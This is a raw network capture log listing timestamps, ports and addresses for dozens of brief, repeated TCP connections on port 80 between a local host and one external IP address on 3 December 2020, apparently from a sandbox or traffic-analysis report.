                                    Dec 3, 2020 10:04:10.861552000 CET805000347.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:10.861680984 CET5000380192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:10.861738920 CET5000380192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:10.878195047 CET805000347.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:11.051664114 CET5000480192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:11.068320990 CET805000447.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:11.068559885 CET5000480192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:11.075915098 CET5000480192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:11.092580080 CET805000447.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:11.092772961 CET5000480192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:11.109503031 CET805000447.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:11.206682920 CET805000447.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:11.206799984 CET5000480192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:11.206852913 CET5000480192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:11.223594904 CET805000447.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:11.419749975 CET5000580192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:11.436487913 CET805000547.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:11.436644077 CET5000580192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:11.442584038 CET5000580192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:11.459404945 CET805000547.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:11.459582090 CET5000580192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:11.476367950 CET805000547.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:11.511030912 CET805000547.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:11.511137962 CET5000580192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:11.511174917 CET5000580192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:11.527751923 CET805000547.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:11.698280096 CET5000680192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:11.714854002 CET805000647.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:11.715018988 CET5000680192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:11.722306967 CET5000680192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:11.738941908 CET805000647.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:11.739063978 CET5000680192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:11.755615950 CET805000647.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:11.775321007 CET805000647.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:11.775479078 CET5000680192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:11.777173996 CET5000680192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:11.793826103 CET805000647.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:11.972661018 CET5000780192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:11.989423990 CET805000747.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:11.989566088 CET5000780192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:11.992415905 CET5000780192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:12.009082079 CET805000747.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:12.009205103 CET5000780192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:12.025809050 CET805000747.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:12.055450916 CET805000747.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:12.055567026 CET5000780192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:12.055596113 CET5000780192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:12.072154999 CET805000747.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:12.275696993 CET5000880192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:12.292453051 CET805000847.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:12.292584896 CET5000880192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:12.296638966 CET5000880192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:12.313261032 CET805000847.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:12.313354015 CET5000880192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:12.330482006 CET805000847.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:12.396986961 CET805000847.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:12.397209883 CET5000880192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:12.397279024 CET5000880192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:12.413909912 CET805000847.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:12.614876032 CET5000980192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:12.631334066 CET805000947.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:12.631442070 CET5000980192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:12.634506941 CET5000980192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:12.650995970 CET805000947.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:12.652398109 CET5000980192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:12.668929100 CET805000947.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:12.694489002 CET805000947.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:12.696116924 CET5000980192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:12.696170092 CET5000980192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:12.712732077 CET805000947.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:12.893912077 CET5001080192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:12.910433054 CET805001047.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:12.910541058 CET5001080192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:12.913599968 CET5001080192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:12.930088043 CET805001047.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:12.930231094 CET5001080192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:12.946727991 CET805001047.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:12.980752945 CET805001047.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:12.981408119 CET5001080192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:12.981466055 CET5001080192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:13.000746012 CET805001047.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:13.172969103 CET5001180192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:13.189420938 CET805001147.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:13.189513922 CET5001180192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:13.192842960 CET5001180192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:13.209276915 CET805001147.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:13.209367990 CET5001180192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:13.225830078 CET805001147.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:13.277596951 CET805001147.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:13.277704000 CET5001180192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:13.277760029 CET5001180192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:13.294188023 CET805001147.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:13.484927893 CET5001280192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:13.501344919 CET805001247.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:13.501513004 CET5001280192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:13.509327888 CET5001280192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:13.525746107 CET805001247.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:13.525840998 CET5001280192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:13.542252064 CET805001247.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:13.581255913 CET805001247.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:13.581425905 CET5001280192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:13.581485987 CET5001280192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:13.597893953 CET805001247.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:13.803247929 CET5001380192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:13.819921017 CET805001347.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:13.820071936 CET5001380192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:13.827815056 CET5001380192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:13.844465971 CET805001347.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:13.844646931 CET5001380192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:13.861179113 CET805001347.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:13.898849010 CET805001347.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:13.898952007 CET5001380192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:13.899012089 CET5001380192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:13.915524960 CET805001347.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:14.100229979 CET5001480192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:14.116950989 CET805001447.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:14.117126942 CET5001480192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:14.124274015 CET5001480192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:14.140918970 CET805001447.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:14.141046047 CET5001480192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:14.157610893 CET805001447.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:14.184983015 CET805001447.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:14.185125113 CET5001480192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:14.185175896 CET5001480192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:14.201704979 CET805001447.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:14.385565996 CET5001580192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:14.402023077 CET805001547.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:14.402126074 CET5001580192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:14.405318022 CET5001580192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:14.421705008 CET805001547.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:14.421847105 CET5001580192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:14.438127995 CET805001547.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:14.465338945 CET805001547.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:14.465454102 CET5001580192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:14.465512991 CET5001580192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:14.481858969 CET805001547.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:14.672597885 CET5001680192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:14.689030886 CET805001647.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:14.689165115 CET5001680192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:14.692821980 CET5001680192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:14.709203959 CET805001647.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:14.709280014 CET5001680192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:14.725720882 CET805001647.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:14.751430988 CET805001647.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:14.751591921 CET5001680192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:14.751656055 CET5001680192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:14.768068075 CET805001647.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:14.938872099 CET5001780192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:14.955492020 CET805001747.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:14.955619097 CET5001780192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:14.958775997 CET5001780192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:14.975168943 CET805001747.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:14.975238085 CET5001780192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:14.991569042 CET805001747.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:15.017358065 CET805001747.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:15.017584085 CET5001780192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:15.017658949 CET5001780192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:15.034039021 CET805001747.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:15.216419935 CET5001880192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:15.232959986 CET805001847.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:15.233110905 CET5001880192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:15.237436056 CET5001880192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:15.253902912 CET805001847.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:15.257222891 CET5001880192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:15.273819923 CET805001847.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:15.303064108 CET805001847.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:15.303216934 CET5001880192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:15.303256035 CET5001880192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:15.319804907 CET805001847.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:15.494087934 CET5001980192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:15.510677099 CET805001947.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:15.510853052 CET5001980192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:15.514678955 CET5001980192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:15.531291962 CET805001947.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:15.531507969 CET5001980192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:15.548074961 CET805001947.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:15.574409008 CET805001947.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:15.574506044 CET5001980192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:15.574590921 CET5001980192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:15.590997934 CET805001947.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:15.771656990 CET5002080192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:15.788291931 CET805002047.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:15.788485050 CET5002080192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:15.796982050 CET5002080192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:15.813797951 CET805002047.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:15.813976049 CET5002080192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:15.830735922 CET805002047.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:15.856977940 CET805002047.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:15.857212067 CET5002080192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:15.857343912 CET5002080192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:15.873888016 CET805002047.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:16.052254915 CET5002180192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:16.069032907 CET805002147.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:16.069217920 CET5002180192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:16.076667070 CET5002180192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:16.093292952 CET805002147.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:16.097709894 CET5002180192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:16.114250898 CET805002147.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:16.139504910 CET805002147.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:16.139688969 CET5002180192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:16.139847040 CET5002180192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:16.156301022 CET805002147.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:16.547336102 CET5002280192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:16.563739061 CET805002247.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:16.563990116 CET5002280192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:16.567527056 CET5002280192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:16.583939075 CET805002247.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:16.584451914 CET5002280192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:16.601227045 CET805002247.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:16.627367973 CET805002247.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:16.627465963 CET5002280192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:16.627553940 CET5002280192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:16.643896103 CET805002247.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:16.849905014 CET5002380192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:16.866354942 CET805002347.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:16.866848946 CET5002380192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:16.871689081 CET5002380192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:16.890990019 CET805002347.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:16.891112089 CET5002380192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:16.907560110 CET805002347.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:16.927499056 CET805002347.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:16.927674055 CET5002380192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:16.927918911 CET5002380192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:16.944273949 CET805002347.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:17.140444994 CET5002480192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:17.157094002 CET805002447.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:17.157191992 CET5002480192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:17.160446882 CET5002480192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:17.177015066 CET805002447.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:17.177095890 CET5002480192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:17.193681955 CET805002447.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:17.228399038 CET805002447.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:17.228485107 CET5002480192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:17.228519917 CET5002480192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:17.245364904 CET805002447.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:17.864172935 CET5002580192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:17.880712986 CET805002547.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:17.880831003 CET5002580192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:17.884115934 CET5002580192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:17.901021004 CET805002547.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:17.901098967 CET5002580192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:17.917524099 CET805002547.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:17.950229883 CET805002547.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:17.950340986 CET5002580192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:17.950390100 CET5002580192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:17.966783047 CET805002547.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:18.162319899 CET5002680192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:18.178782940 CET805002647.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:18.178879023 CET5002680192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:18.181600094 CET5002680192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:18.198055029 CET805002647.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:18.198190928 CET5002680192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:18.214591026 CET805002647.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:18.240684986 CET805002647.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:18.240844011 CET5002680192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:18.326303005 CET5002680192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:18.342976093 CET805002647.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:19.946569920 CET5002780192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:19.963243008 CET805002747.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:19.963383913 CET5002780192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:19.967293024 CET5002780192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:19.983963013 CET805002747.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:19.984064102 CET5002780192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:20.000654936 CET805002747.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:20.027369022 CET805002747.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:20.027492046 CET5002780192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:20.027524948 CET5002780192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:20.044378996 CET805002747.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:20.255585909 CET5002880192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:20.272245884 CET805002847.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:20.272386074 CET5002880192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:20.275988102 CET5002880192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:20.292624950 CET805002847.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:20.292846918 CET5002880192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:20.309469938 CET805002847.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:20.335599899 CET805002847.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:20.335695028 CET5002880192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:20.335753918 CET5002880192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:20.352312088 CET805002847.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:20.529881001 CET5002980192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:20.546515942 CET805002947.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:20.546910048 CET5002980192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:20.550108910 CET5002980192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:20.566751957 CET805002947.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:20.566878080 CET5002980192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:20.583478928 CET805002947.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:20.616817951 CET805002947.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:20.616996050 CET5002980192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:20.617019892 CET5002980192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:20.633574963 CET805002947.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:20.832252026 CET5003080192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:20.848933935 CET805003047.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:20.849176884 CET5003080192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:20.852617025 CET5003080192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:20.869328976 CET805003047.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:20.869508982 CET5003080192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:20.886173010 CET805003047.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:21.067117929 CET805003047.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:21.067245007 CET5003080192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:21.067292929 CET5003080192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:21.083791971 CET805003047.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:21.276993990 CET5003180192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:21.293648958 CET805003147.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:21.293844938 CET5003180192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:21.297703028 CET5003180192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:21.314218044 CET805003147.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:21.314348936 CET5003180192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:21.330854893 CET805003147.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:21.363495111 CET805003147.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:21.363646030 CET5003180192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:21.363703012 CET5003180192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:21.380259991 CET805003147.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:21.555741072 CET5003280192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:21.572384119 CET805003247.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:21.572530031 CET5003280192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:21.576517105 CET5003280192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:21.593106985 CET805003247.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:21.593246937 CET5003280192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:21.609709024 CET805003247.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:21.640626907 CET805003247.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:21.641113043 CET5003280192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:21.641134977 CET5003280192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:21.657679081 CET805003247.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:21.881999969 CET5003380192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:21.898478985 CET805003347.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:21.898641109 CET5003380192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:21.902507067 CET5003380192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:21.918993950 CET805003347.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:21.920439959 CET5003380192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:21.936877012 CET805003347.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:21.955470085 CET805003347.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:21.955590010 CET5003380192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:21.955641031 CET5003380192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:21.972438097 CET805003347.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:22.150783062 CET5003480192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:22.167351007 CET805003447.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:22.167556047 CET5003480192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:22.174315929 CET5003480192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:22.190846920 CET805003447.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:22.190910101 CET5003480192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:22.207365036 CET805003447.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:22.233496904 CET805003447.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:22.233686924 CET5003480192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:22.233728886 CET5003480192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:22.250255108 CET805003447.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:22.422760010 CET5003580192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:22.439274073 CET805003547.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:22.439471960 CET5003580192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:22.442214012 CET5003580192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:22.458806038 CET805003547.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:22.458952904 CET5003580192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:22.475471973 CET805003547.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:22.546780109 CET805003547.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:22.546910048 CET5003580192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:22.546983004 CET5003580192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:22.563405991 CET805003547.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:22.748981953 CET5003680192.168.2.347.91.79.163
